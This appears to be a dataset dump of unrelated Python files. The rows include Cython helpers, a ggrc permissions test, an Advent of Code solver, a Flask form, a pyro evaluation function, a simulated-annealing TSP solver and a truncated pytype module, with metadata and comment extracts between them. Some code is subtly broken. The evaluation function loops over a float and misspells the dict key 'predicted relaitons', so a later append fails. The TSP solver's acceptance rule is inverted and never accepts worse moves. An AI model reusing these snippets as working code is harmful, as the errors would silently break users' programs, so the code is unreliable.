def detect_file_encoding(source_filename):
f = open_source_file(source_filename, encoding="UTF-8", error_handling='ignore')
try:
return detect_opened_file_encoding(f)
finally:
f.close()
def detect_opened_file_encoding(f):
# PEPs 263 and 3120
# Most of the time the first two lines fall in the first 250 chars,
# and this bulk read/split is much faster.
lines = f.read(250).split(u"\n")
if len(lines) > 1:
m = _match_file_encoding(lines[0])
if m:
return m.group(1)
elif len(lines) > 2:
m = _match_file_encoding(lines[1])
if m:
return m.group(1)
else:
return "UTF-8"
# Fallback to one-char-at-a-time detection.
f.seek(0)
chars = []
for i in range(2):
c = f.read(1)
while c and c != u'\n':
chars.append(c)
c = f.read(1)
encoding = _match_file_encoding(u''.join(chars))
if encoding:
return encoding.group(1)
return "UTF-8"
def skip_bom(f):
"""
Read past a BOM at the beginning of a source file.
This could be added to the scanner, but it's *substantially* easier
to keep it at this level.
"""
if f.read(1) != u'\uFEFF':
f.seek(0)
def open_source_file(source_filename, mode="r",
encoding=None, error_handling=None):
if encoding is None:
# Most of the time the coding is unspecified, so be optimistic that
# it's UTF-8.
f = open_source_file(source_filename, encoding="UTF-8", mode=mode, error_handling='ignore')
encoding = detect_opened_file_encoding(f)
if encoding == "UTF-8" and error_handling == 'ignore':
f.seek(0)
skip_bom(f)
return f
else:
f.close()
if not os.path.exists(source_filename):
try:
loader = __loader__
if source_filename.startswith(loader.archive):
return open_source_from_loader(
loader, source_filename,
encoding, error_handling)
except (NameError, AttributeError):
pass
stream = io.open(source_filename, mode=mode,
encoding=encoding, errors=error_handling)
skip_bom(stream)
return stream
def open_source_from_loader(loader,
source_filename,
encoding=None, error_handling=None):
nrmpath = os.path.normpath(source_filename)
arcname = nrmpath[len(loader.archive)+1:]
data = loader.get_data(arcname)
return io.TextIOWrapper(io.BytesIO(data),
encoding=encoding,
errors=error_handling)
def str_to_number(value):
# note: this expects a string as input that was accepted by the
# parser already, with an optional "-" sign in front
is_neg = False
if value[:1] == '-':
is_neg = True
value = value[1:]
if len(value) < 2:
value = int(value, 0)
elif value[0] == '0':
literal_type = value[1] # 0'o' - 0'b' - 0'x'
if literal_type in 'xX':
# hex notation ('0x1AF')
value = int(value[2:], 16)
elif literal_type in 'oO':
# Py3 octal notation ('0o136')
value = int(value[2:], 8)
elif literal_type in 'bB':
# Py3 binary notation ('0b101')
value = int(value[2:], 2)
else:
# Py2 octal notation ('0136')
value = int(value, 8)
else:
value = int(value, 0)
return -value if is_neg else value
def long_literal(value):
if isinstance(value, basestring):
value = str_to_number(value)
return not -2**31 <= value < 2**31
@cached_function
def get_cython_cache_dir():
"""get the cython cache dir
Priority:
1. CYTHON_CACHE_DIR
2. (OS X): ~/Library/Caches/Cython
(posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined
3. ~/.cython
"""
if 'CYTHON_CACHE_DIR' in os.environ:
return os.environ['CYTHON_CACHE_DIR']
parent = None
if os.name == 'posix':
if sys.platform == 'darwin':
parent = os.path.expanduser('~/Library/Caches')
else:
# this could fallback on ~/.cache
parent = os.environ.get('XDG_CACHE_HOME')
if parent and os.path.isdir(parent):
return os.path.join(parent, 'cython')
# last fallback: ~/.cython
return os.path.expanduser(os.path.join('~', '.cython'))
@contextmanager
def captured_fd(stream=2, encoding=None):
pipe_in = t = None
orig_stream = os.dup(stream) # keep copy of original stream
try:
pipe_in, pipe_out = os.pipe()
os.dup2(pipe_out, stream) # replace stream by copy of pipe
try:
os.close(pipe_out) # close original pipe-out stream
data = []
def copy():
try:
while True:
d = os.read(pipe_in, 1000)
if d:
data.append(d)
else:
break
finally:
os.close(pipe_in)
def get_output():
output = b''.join(data)
if encoding:
output = output.decode(encoding)
return output
from threading import Thread
t = Thread(target=copy)
t.daemon = True # just in case
t.start()
yield get_output
finally:
os.dup2(orig_stream, stream) # restore original stream
if t is not None:
t.join()
finally:
os.close(orig_stream)
def print_bytes(s, end=b'\n', file=sys.stdout, flush=True):
file.flush()
try:
out = file.buffer # Py3
except AttributeError:
out = file # Py2
out.write(s)
if end:
out.write(end)
if flush:
out.flush()
class LazyStr:
def __init__(self, callback):
self.callback = callback
def __str__(self):
return self.callback()
def __repr__(self):
return self.callback()
def __add__(self, right):
return self.callback() + right
def __radd__(self, left):
return left + self.callback()
# Class decorator that adds a metaclass and recreates the class with it.
# Copied from 'six'.
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
|
en
| 0.85522
|
# # Cython -- Things that don't belong # anywhere else in particular # # Make sure to create a new file here so we can # safely hard link the output files. # we use the ISO-8859-1 encoding here because we only write pure # ASCII strings or (e.g. for file names) byte encoded strings as # Unicode, so we need a direct mapping from the first 256 Unicode # characters to a byte sequence, which ISO-8859-1 provides # note: can't use io.open() in Py2 as we may be writing str objects # Remove junk contents from an output file after a # failed compilation. # Also sets access and modification times back to # those specified by st (a stat struct). # Search the list of include directories for the given # file name. If a source file position is given, first # searches the directory containing that file. Returns # None if not found, but does not report an error. # The 'include' option will disable package dereferencing. # If 'sys_path' is True, also search sys.path. # Arcadia-specific lookup: search for packages in include paths, # ignoring existence of __init__.py files as packages markers # (they are not required by Arcadia build system) # try on the filesystem first # figure out if a PEP 302 loader is around # XXX the code below assumes a 'zipimport.zipimporter' instance # XXX should be easy to generalize, but too lazy right now to write it # file name encodings # support for source file encoding detection # PEPs 263 and 3120 # Most of the time the first two lines fall in the first 250 chars, # and this bulk read/split is much faster. # Fallback to one-char-at-a-time detection. Read past a BOM at the beginning of a source file. This could be added to the scanner, but it's *substantially* easier to keep it at this level. # Most of the time the coding is unspecified, so be optimistic that # it's UTF-8. # note: this expects a string as input that was accepted by the # parser already, with an optional "-" sign in front # 0'o' - 0'b' - 0'x' # hex notation ('0x1AF') # Py3 octal notation ('0o136') # Py3 binary notation ('0b101') # Py2 octal notation ('0136') get the cython cache dir Priority: 1. CYTHON_CACHE_DIR 2. (OS X): ~/Library/Caches/Cython (posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined 3. ~/.cython # this could fallback on ~/.cache # last fallback: ~/.cython # keep copy of original stream # replace stream by copy of pipe # close original pipe-out stream # just in case # restore original stream # Py3 # Py2 # Class decorator that adds a metaclass and recreates the class with it. # Copied from 'six'. Class decorator for creating a class with a metaclass.
| 2.350389
| 2
|
test/integration/ggrc/access_control/acl_propagation/test_one_rank_technical_leads.py
|
sfarbotka/ggrc-core
| 0
|
6628129
|
<filename>test/integration/ggrc/access_control/acl_propagation/test_one_rank_technical_leads.py
# Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test Access Control roles Technical Leads propagation"""
import ddt
from ggrc.models import all_models
from integration.ggrc.access_control import rbac_factories
from integration.ggrc.access_control.acl_propagation import base
from integration.ggrc.utils import helpers
@ddt.ddt
class TestTechnicalLeadsPropagation(base.TestACLPropagation):
"""Test Technical Leads role permissions propagation
This tests are different from other ACR test in acr_propagation package
because we map document to parent directly (one rank)
e.g Control -> with document.Reference URL and check that
Control's Admin can read/create etc document and its comments.
"""
PERMISSIONS = {
"Creator": {
"Universal KeyReport": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
"Universal AccountBalance": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
},
"Reader": {
"Universal KeyReport": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
"Universal AccountBalance": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
},
"Editor": {
"Universal KeyReport": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
"Universal AccountBalance": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
},
}
def init_factory(self, role, model, parent):
"""Initialize RBAC factory with propagated Technical Leads role.
Args:
role: Global Custom role that user have (Creator/Reader/Editor).
model: Model name for which factory should be got.
parent: Model name in scope of which objects should be installed.
Returns:
Initialized RBACFactory object.
"""
self.setup_people()
technical_leads = all_models.AccessControlRole.query.filter_by(
name="Technical Leads",
object_type=parent,
).first()
rbac_factory = rbac_factories.TEST_FACTORIES_MAPPING[model]
return rbac_factory(self.people[role].id, technical_leads, parent)
@helpers.unwrap(PERMISSIONS)
def test_access(self, role, model, action_name, expected_result):
"""Technical Leads {0:<7}: On {1:<20} test {2:<20} - Expected {3:<2} """
self.runtest(role, model, action_name, expected_result)
|
<filename>test/integration/ggrc/access_control/acl_propagation/test_one_rank_technical_leads.py
# Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test Access Control roles Technical Leads propagation"""
import ddt
from ggrc.models import all_models
from integration.ggrc.access_control import rbac_factories
from integration.ggrc.access_control.acl_propagation import base
from integration.ggrc.utils import helpers
@ddt.ddt
class TestTechnicalLeadsPropagation(base.TestACLPropagation):
"""Test Technical Leads role permissions propagation
This tests are different from other ACR test in acr_propagation package
because we map document to parent directly (one rank)
e.g Control -> with document.Reference URL and check that
Control's Admin can read/create etc document and its comments.
"""
PERMISSIONS = {
"Creator": {
"Universal KeyReport": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
"Universal AccountBalance": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
},
"Reader": {
"Universal KeyReport": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
"Universal AccountBalance": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
},
"Editor": {
"Universal KeyReport": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
"Universal AccountBalance": {
"create_and_map_document": True,
"read_document": True,
"update_document": True,
"delete_document": False,
"create_and_map_comment": True,
"read_comment": True,
"create_and_map_document_comment": True,
"read_document_comment": True,
},
},
}
def init_factory(self, role, model, parent):
"""Initialize RBAC factory with propagated Technical Leads role.
Args:
role: Global Custom role that user have (Creator/Reader/Editor).
model: Model name for which factory should be got.
parent: Model name in scope of which objects should be installed.
Returns:
Initialized RBACFactory object.
"""
self.setup_people()
technical_leads = all_models.AccessControlRole.query.filter_by(
name="Technical Leads",
object_type=parent,
).first()
rbac_factory = rbac_factories.TEST_FACTORIES_MAPPING[model]
return rbac_factory(self.people[role].id, technical_leads, parent)
@helpers.unwrap(PERMISSIONS)
def test_access(self, role, model, action_name, expected_result):
"""Technical Leads {0:<7}: On {1:<20} test {2:<20} - Expected {3:<2} """
self.runtest(role, model, action_name, expected_result)
|
en
| 0.823863
|
# Copyright (C) 2019 Google Inc. # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> Test Access Control roles Technical Leads propagation Test Technical Leads role permissions propagation This tests are different from other ACR test in acr_propagation package because we map document to parent directly (one rank) e.g Control -> with document.Reference URL and check that Control's Admin can read/create etc document and its comments. Initialize RBAC factory with propagated Technical Leads role. Args: role: Global Custom role that user have (Creator/Reader/Editor). model: Model name for which factory should be got. parent: Model name in scope of which objects should be installed. Returns: Initialized RBACFactory object. Technical Leads {0:<7}: On {1:<20} test {2:<20} - Expected {3:<2}
| 2.063493
| 2
|
python/day03/binary_diagnostic.py
|
aesdeef/advent-of-code-2021
| 2
|
6628130
|
from collections import Counter
from typing import Callable, Iterable
INPUT_FILE = "../../input/03.txt"
def parse_input() -> list[str]:
"""
Parses the data and returns a list of binary entries
"""
with open(INPUT_FILE, "r") as f:
return [line.strip() for line in f]
def more_common_bit(bits: Iterable[str]) -> str:
"""
Returns the more common bit or "1" if both are equally common
"""
c = Counter(bits)
return "1" if c["1"] >= c["0"] else "0"
def less_common_bit(bits: Iterable[str]) -> str:
"""
Returns the less common bit or "0" if both are equally common
"""
c = Counter(bits)
return "0" if c["1"] >= c["0"] else "1"
def multiply_binary(first: str, second: str) -> int:
"""
Parses two strings representing binary numbers and multiplies them
"""
return int(first, 2) * int(second, 2)
def solve_part1(data: list[str]) -> int:
"""
Finds the solution to part 1 (the power consumption of the submarine)
"""
gamma = ""
epsilon = ""
for bits in zip(*data):
gamma += more_common_bit(bits)
epsilon += less_common_bit(bits)
return multiply_binary(gamma, epsilon)
def find_rating(data: list[str], keep_condition: Callable[[list[str]], str]) -> str:
"""
Finds the rating by going through each bit position and keeping only those
entries where the ith bit matches the one returned by the keep_condition
function
"""
for i in range(len(data[0])):
bits = [entry[i] for entry in data]
data = [entry for entry in data if entry[i] == keep_condition(bits)]
if len(data) == 1:
return data[0]
raise ValueError("could not find the rating")
def solve_part2(data: list[str]) -> int:
"""
Finds the solution to part 2 (the life support rating of the submarine)
"""
oxygen_generator_rating = find_rating(data, more_common_bit)
co2_scrubber_rating = find_rating(data, less_common_bit)
return multiply_binary(oxygen_generator_rating, co2_scrubber_rating)
if __name__ == "__main__":
data = parse_input()
part1 = solve_part1(data)
part2 = solve_part2(data)
print(part1)
print(part2)
|
from collections import Counter
from typing import Callable, Iterable
INPUT_FILE = "../../input/03.txt"
def parse_input() -> list[str]:
"""
Parses the data and returns a list of binary entries
"""
with open(INPUT_FILE, "r") as f:
return [line.strip() for line in f]
def more_common_bit(bits: Iterable[str]) -> str:
"""
Returns the more common bit or "1" if both are equally common
"""
c = Counter(bits)
return "1" if c["1"] >= c["0"] else "0"
def less_common_bit(bits: Iterable[str]) -> str:
"""
Returns the less common bit or "0" if both are equally common
"""
c = Counter(bits)
return "0" if c["1"] >= c["0"] else "1"
def multiply_binary(first: str, second: str) -> int:
"""
Parses two strings representing binary numbers and multiplies them
"""
return int(first, 2) * int(second, 2)
def solve_part1(data: list[str]) -> int:
"""
Finds the solution to part 1 (the power consumption of the submarine)
"""
gamma = ""
epsilon = ""
for bits in zip(*data):
gamma += more_common_bit(bits)
epsilon += less_common_bit(bits)
return multiply_binary(gamma, epsilon)
def find_rating(data: list[str], keep_condition: Callable[[list[str]], str]) -> str:
"""
Finds the rating by going through each bit position and keeping only those
entries where the ith bit matches the one returned by the keep_condition
function
"""
for i in range(len(data[0])):
bits = [entry[i] for entry in data]
data = [entry for entry in data if entry[i] == keep_condition(bits)]
if len(data) == 1:
return data[0]
raise ValueError("could not find the rating")
def solve_part2(data: list[str]) -> int:
"""
Finds the solution to part 2 (the life support rating of the submarine)
"""
oxygen_generator_rating = find_rating(data, more_common_bit)
co2_scrubber_rating = find_rating(data, less_common_bit)
return multiply_binary(oxygen_generator_rating, co2_scrubber_rating)
if __name__ == "__main__":
data = parse_input()
part1 = solve_part1(data)
part2 = solve_part2(data)
print(part1)
print(part2)
|
en
| 0.935407
|
Parses the data and returns a list of binary entries Returns the more common bit or "1" if both are equally common Returns the less common bit or "0" if both are equally common Parses two strings representing binary numbers and multiplies them Finds the solution to part 1 (the power consumption of the submarine) Finds the rating by going through each bit position and keeping only those entries where the ith bit matches the one returned by the keep_condition function Finds the solution to part 2 (the life support rating of the submarine)
| 3.847565
| 4
|
shopyo/modules/box__bizhelp/page/forms.py
|
Bnseamster/shopyo
| 23
|
6628131
|
from flask_wtf import FlaskForm
# from wtforms.validators import Length
# from wtforms.fields.html5 import EmailField
from wtforms import StringField
from wtforms import TextAreaField
from wtforms.validators import DataRequired
from shopyoapi.validators import verify_slug
class PageForm(FlaskForm):
content = TextAreaField(
"Content",
[],
render_kw={
"class": "form-control",
"rows": "20",
"autocomplete": "off",
},
)
slug = StringField(
"Slug",
[DataRequired(), verify_slug],
render_kw={"class": "form-control", "autocomplete": "off"},
)
title = StringField(
"Title",
[DataRequired()],
render_kw={"class": "form-control", "autocomplete": "off"},
)
|
from flask_wtf import FlaskForm
# from wtforms.validators import Length
# from wtforms.fields.html5 import EmailField
from wtforms import StringField
from wtforms import TextAreaField
from wtforms.validators import DataRequired
from shopyoapi.validators import verify_slug
class PageForm(FlaskForm):
content = TextAreaField(
"Content",
[],
render_kw={
"class": "form-control",
"rows": "20",
"autocomplete": "off",
},
)
slug = StringField(
"Slug",
[DataRequired(), verify_slug],
render_kw={"class": "form-control", "autocomplete": "off"},
)
title = StringField(
"Title",
[DataRequired()],
render_kw={"class": "form-control", "autocomplete": "off"},
)
|
en
| 0.619884
|
# from wtforms.validators import Length # from wtforms.fields.html5 import EmailField
| 2.195665
| 2
|
src/evaluate.py
|
jadeleiyu/noun2verb
| 0
|
6628132
|
<gh_stars>0
from pyro.infer.predictive import Predictive
from data_prep import prepare_data
def evaluate(generator, eval_data_loader, vocab, sample_size, batch_size):
predict_fn = Predictive(generator.model, generator.guide, num_samples=sample_size, return_sites=('v', 'r', 'z'))
num_batches = len(eval_data_loader) / batch_size
eval_iter = iter(eval_data_loader)
predict_df = {
'subject': [],
'object': [],
'target': [],
'true predicate': [],
'true relation': [],
'predicted predicates': [],
'predicted relaitons': []
}
for i in range(num_batches):
subs, objs, targets, relations, predicates = next(eval_iter)
for j in range(batch_size):
predict_df['subject'].append(subs[j])
predict_df['object'].append(objs[j])
predict_df['target'].append(targets[j])
predict_df['true predicate'].append(predicates[j])
predict_df['true relation'].append(relations[j])
subs, objs, targets, relations, predicates = prepare_data(subs, objs, targets, relations, predicates, vocab)
batch_pred_samples = predict_fn(subs, objs, targets, relations, predicates)['v'].view(batch_size, -1)
batch_rel_samples = predict_fn(subs, objs, targets, relations, predicates)['r'].view(batch_size, -1)
assert batch_pred_samples.shape[-1] == sample_size and batch_rel_samples.shape[-1] == sample_size
for j in range(batch_size):
# there're 'sample_size' sampled predicates and relations from the guide posterior
sampled_predicates_idx = batch_pred_samples[j]
sampled_rel_idx = batch_rel_samples[j]
sampled_predicates = [vocab.i2w[pred_idx_tensor.item()] for pred_idx_tensor in sampled_predicates_idx]
sampled_relations = [vocab.i2w[rel_idx_tensor.item()] for rel_idx_tensor in sampled_rel_idx]
predict_df['predicted predicates'].append(sampled_predicates)
predict_df['predicted relations'].append(sampled_relations)
return predict_df
|
from pyro.infer.predictive import Predictive
from data_prep import prepare_data
def evaluate(generator, eval_data_loader, vocab, sample_size, batch_size):
predict_fn = Predictive(generator.model, generator.guide, num_samples=sample_size, return_sites=('v', 'r', 'z'))
num_batches = len(eval_data_loader) / batch_size
eval_iter = iter(eval_data_loader)
predict_df = {
'subject': [],
'object': [],
'target': [],
'true predicate': [],
'true relation': [],
'predicted predicates': [],
'predicted relaitons': []
}
for i in range(num_batches):
subs, objs, targets, relations, predicates = next(eval_iter)
for j in range(batch_size):
predict_df['subject'].append(subs[j])
predict_df['object'].append(objs[j])
predict_df['target'].append(targets[j])
predict_df['true predicate'].append(predicates[j])
predict_df['true relation'].append(relations[j])
subs, objs, targets, relations, predicates = prepare_data(subs, objs, targets, relations, predicates, vocab)
batch_pred_samples = predict_fn(subs, objs, targets, relations, predicates)['v'].view(batch_size, -1)
batch_rel_samples = predict_fn(subs, objs, targets, relations, predicates)['r'].view(batch_size, -1)
assert batch_pred_samples.shape[-1] == sample_size and batch_rel_samples.shape[-1] == sample_size
for j in range(batch_size):
# there're 'sample_size' sampled predicates and relations from the guide posterior
sampled_predicates_idx = batch_pred_samples[j]
sampled_rel_idx = batch_rel_samples[j]
sampled_predicates = [vocab.i2w[pred_idx_tensor.item()] for pred_idx_tensor in sampled_predicates_idx]
sampled_relations = [vocab.i2w[rel_idx_tensor.item()] for rel_idx_tensor in sampled_rel_idx]
predict_df['predicted predicates'].append(sampled_predicates)
predict_df['predicted relations'].append(sampled_relations)
return predict_df
|
en
| 0.769685
|
# there're 'sample_size' sampled predicates and relations from the guide posterior
| 2.221261
| 2
|
schedule_booking/apps.py
|
matteli/pop
| 0
|
6628133
|
from django.apps import AppConfig
class ScheduleBookingConfig(AppConfig):
name = 'schedule_booking'
|
from django.apps import AppConfig
class ScheduleBookingConfig(AppConfig):
name = 'schedule_booking'
|
none
| 1
| 1.167336
| 1
|
|
sample_app/boards/features/steps/board_steps.py
|
CCE-IT/cce-toolkit
| 8
|
6628134
|
<reponame>CCE-IT/cce-toolkit
from toolkit.helpers.bdd.shared_steps import *
|
from toolkit.helpers.bdd.shared_steps import *
|
none
| 1
| 1.020288
| 1
|
|
3IntelligentOptimization/TSP_SA.py
|
intLyc/Undergraduate-Courses
| 0
|
6628135
|
<reponame>intLyc/Undergraduate-Courses
"""
@author: zll
description:
模拟退火算法求解TSP
"""
import random
import time
import math
T0 = 50000.0 # 初始温度
T_min = 1e-8
q = 0.98 # 退火系数
K = 1 # 公式中的常数K
L = 1000 # 每个温度时的迭代次数,即链长
N = 52 # 城市数量
# 柏林52城算例
city = [
[565, 575], [25, 185], [345, 750], [945, 685], [845, 655],
[880, 660], [25, 230], [525, 1000], [580, 1175], [650, 1130],
[1605, 620], [1220, 580], [1465, 200], [1530, 5],
[845, 680], [725, 370], [145, 665],
[415, 635], [510, 875], [560, 365], [300, 465], [520, 585], [480, 415],
[835, 625], [975, 580], [1215, 245], [1320, 315], [1250, 400], [660, 180],
[410, 250], [420, 555], [575, 665], [1150, 1160], [700, 580], [685, 595],
[685, 610], [770, 610], [795, 645], [720, 635], [760, 650], [475, 960],
[95, 260], [875, 920], [700, 500], [555, 815], [830, 485], [1170, 65],
[830, 610], [605, 625], [595, 360], [1340, 725], [1740, 245]
]
def cal_distance(id1, id2):
distance = math.sqrt((city[id1][0] - city[id2][0])
** 2 + (city[id1][1] - city[id2][1])**2)
return distance
def path_len(city_list):
path = 0
for i in range(N):
path += cal_distance(city_list[i], city_list[i + 1])
return path
def SA():
def creat_new(city_list):
new_list = city_list[:]
i = random.randint(1, N - 1)
j = random.randint(1, N - 1)
while j == i:
j = random.randint(1, N - 1)
temp = new_list[i]
new_list[i] = new_list[j]
new_list[j] = temp
return new_list
count = 0
best_route = [] # 全局最优解
for i in range(N):
best_route.append(i)
best_route.append(0)
best = path_len(best_route)
T = T0
while T > T_min:
for i in range(N):
new_route = creat_new(best_route)
new = path_len(new_route)
delta = new - best
if delta < 0:
best_route = new_route[:]
best = new
else:
r = random.random()
if delta / (K * T) < 500 and math.exp(delta / (K * T)) < r:
best_route = new_route[:]
best = new
T *= q
count += 1
print("共降温", count, "次,当前满意解为", best)
result = dict()
result['cost'] = best
result['route'] = best_route
return result
def main():
start = time.time()
result = SA()
end = time.time()
duration = end - start
result['time'] = duration
print("初始温度T0=", T0, ",降温系数q=", q, ",每个温度迭代", L, "次")
print(result)
if __name__ == '__main__':
main()
|
"""
@author: zll
description:
模拟退火算法求解TSP
"""
import random
import time
import math
T0 = 50000.0 # 初始温度
T_min = 1e-8
q = 0.98 # 退火系数
K = 1 # 公式中的常数K
L = 1000 # 每个温度时的迭代次数,即链长
N = 52 # 城市数量
# 柏林52城算例
city = [
[565, 575], [25, 185], [345, 750], [945, 685], [845, 655],
[880, 660], [25, 230], [525, 1000], [580, 1175], [650, 1130],
[1605, 620], [1220, 580], [1465, 200], [1530, 5],
[845, 680], [725, 370], [145, 665],
[415, 635], [510, 875], [560, 365], [300, 465], [520, 585], [480, 415],
[835, 625], [975, 580], [1215, 245], [1320, 315], [1250, 400], [660, 180],
[410, 250], [420, 555], [575, 665], [1150, 1160], [700, 580], [685, 595],
[685, 610], [770, 610], [795, 645], [720, 635], [760, 650], [475, 960],
[95, 260], [875, 920], [700, 500], [555, 815], [830, 485], [1170, 65],
[830, 610], [605, 625], [595, 360], [1340, 725], [1740, 245]
]
def cal_distance(id1, id2):
distance = math.sqrt((city[id1][0] - city[id2][0])
** 2 + (city[id1][1] - city[id2][1])**2)
return distance
def path_len(city_list):
path = 0
for i in range(N):
path += cal_distance(city_list[i], city_list[i + 1])
return path
def SA():
def creat_new(city_list):
new_list = city_list[:]
i = random.randint(1, N - 1)
j = random.randint(1, N - 1)
while j == i:
j = random.randint(1, N - 1)
temp = new_list[i]
new_list[i] = new_list[j]
new_list[j] = temp
return new_list
count = 0
best_route = [] # 全局最优解
for i in range(N):
best_route.append(i)
best_route.append(0)
best = path_len(best_route)
T = T0
while T > T_min:
for i in range(N):
new_route = creat_new(best_route)
new = path_len(new_route)
delta = new - best
if delta < 0:
best_route = new_route[:]
best = new
else:
r = random.random()
if delta / (K * T) < 500 and math.exp(delta / (K * T)) < r:
best_route = new_route[:]
best = new
T *= q
count += 1
print("共降温", count, "次,当前满意解为", best)
result = dict()
result['cost'] = best
result['route'] = best_route
return result
def main():
start = time.time()
result = SA()
end = time.time()
duration = end - start
result['time'] = duration
print("初始温度T0=", T0, ",降温系数q=", q, ",每个温度迭代", L, "次")
print(result)
if __name__ == '__main__':
main()
|
zh
| 0.923902
|
@author: zll
description:
模拟退火算法求解TSP # 初始温度 # 退火系数 # 公式中的常数K # 每个温度时的迭代次数,即链长 # 城市数量 # 柏林52城算例 # 全局最优解
| 2.468331
| 2
|
pytype/overlays/classgen.py
|
OrBin/pytype
| 0
|
6628136
|
<reponame>OrBin/pytype<filename>pytype/overlays/classgen.py
"""Base support for generating classes from data declarations.
Contains common functionality used by dataclasses, attrs and namedtuples.
"""
import abc
import collections
import logging
from pytype import abstract
from pytype import abstract_utils
from pytype import mixin
from pytype import overlay_utils
from pytype import special_builtins
import six
log = logging.getLogger(__name__)
# type alias for convenience
Param = overlay_utils.Param
class Ordering(object):
"""Possible orderings for Decorator.get_class_locals."""
# Order by each variable's first annotation. For example, for
# class Foo:
# x: int
# y: str
# x: float
# the locals will be [(x, Instance(float)), (y, Instance(str))]. Note that
# unannotated variables will be skipped, and the values of later annotations
# take precedence over earlier ones.
FIRST_ANNOTATE = object()
# Order by each variable's last definition. So for
# class Foo:
# x = 0
# y = 'hello'
# x = 4.2
# the locals will be [(y, Instance(str)), (x, Instance(float))]. Note that
# variables without assignments will be skipped.
LAST_ASSIGN = object()
class Attribute(object):
"""Represents a class member variable.
Members:
name: field name
typ: field python type
init: Whether the field should be included in the generated __init__
default: Default value
"""
def __init__(self, name, typ, init, default):
self.name = name
self.typ = typ
self.init = init
self.default = default
def __repr__(self):
return str({"name": self.name, "typ": self.typ, "init": self.init,
"default": self.default})
@six.add_metaclass(abc.ABCMeta)
class Decorator(abstract.PyTDFunction):
"""Base class for decorators that generate classes from data declarations."""
# Defaults for the args that we support (dataclasses only support 'init',
# but the others default to false so they should not affect anything).
_DEFAULT_ARGS = {
"init": True,
"kw_only": False,
"auto_attribs": False,
}
def __init__(self, *args, **kwargs):
super(Decorator, self).__init__(*args, **kwargs)
# Decorator.call() is invoked first with args, then with the class to
# decorate, so we need to first store the args and then associate them to
# the right class.
self._current_args = None
self.args = {} # map from each class we decorate to its args
@abc.abstractmethod
def decorate(self, node, cls):
"""Apply the decorator to cls."""
def update_kwargs(self, args):
self._current_args = Decorator._DEFAULT_ARGS.copy()
for k, v in args.namedargs.items():
if k in self._current_args:
try:
self._current_args[k] = abstract_utils.get_atomic_python_constant(v)
except abstract_utils.ConversionError:
self.vm.errorlog.not_supported_yet(
self.vm.frames, "Non-constant argument to decorator: %r" % k)
def init_name(self, attr):
"""Attribute name as an __init__ keyword, could differ from attr.name."""
return attr.name
def make_init(self, node, cls, attrs):
attr_params = []
for attr in attrs:
if attr.init:
# call self.init_name in case the name differs from the field name -
# e.g. attrs removes leading underscores from attrib names when
# generating kwargs for __init__.
attr_params.append(
Param(name=self.init_name(attr),
typ=attr.typ,
default=attr.default))
# The kw_only arg is ignored in python2; using it is not an error.
if self.args[cls]["kw_only"] and self.vm.PY3:
params = []
kwonly_params = attr_params
else:
params = attr_params
kwonly_params = []
return overlay_utils.make_method(self.vm, node, "__init__", params,
kwonly_params)
def type_clash_error(self, value):
if is_late_annotation(value):
err = value.expr
else:
err = value.data[0].cls
self.vm.errorlog.invalid_annotation(self.vm.frames, err)
def get_class_locals(self, cls, allow_methods, ordering):
"""Gets a dictionary of the class's local variables.
Args:
cls: An abstract.InterpreterClass.
allow_methods: A bool, whether to allow methods as variables.
ordering: A classgen.Ordering describing the order in which the variables
should appear.
Returns:
A collections.OrderedDict of the locals.
"""
# TODO(rechen): Once we drop Python 2 support, either use a normal dict or
# replace key deletion with OrderedDict.move_to_end().
out = collections.OrderedDict()
for op in self.vm.local_ops[cls.name]:
if is_dunder(op.name):
continue
local = self.vm.annotated_locals[cls.name][op.name]
if not allow_methods and is_method(local.orig):
continue
if ordering is Ordering.FIRST_ANNOTATE:
if not op.is_annotate() or op.name in out:
continue
else:
assert ordering is Ordering.LAST_ASSIGN
if not op.is_assign():
continue
elif op.name in out:
del out[op.name]
out[op.name] = local
return out
def add_member(self, node, cls, name, value, orig):
